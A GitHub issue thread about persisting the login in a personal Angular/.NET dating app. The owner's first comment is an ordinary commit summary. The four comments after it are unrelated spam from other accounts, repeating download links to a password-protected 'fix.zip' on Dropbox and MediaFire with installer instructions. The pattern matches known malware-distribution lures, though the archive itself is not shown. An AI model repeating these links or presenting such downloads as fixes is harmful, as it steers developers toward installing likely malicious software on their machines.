### ISSUE TITLE
Persist the login

### ISSUE THREAD

**Issue by thewickermilko** [thewickermilko/DatingApp-net8#20]

**Comment by thewickermilko** [comment]
[bce405a](https://github.com/thewickermilko/DatingApp-net8/commit/bce405a06baaa74f0e489caa593b332ee03aa0a7) - 
Created "uset.ts" for Angular interface.
"app.component.ts" - "setCurrentUser" method created and code was modified.
"account.service.ts" - code modified and signals used.

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by QAQ330** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
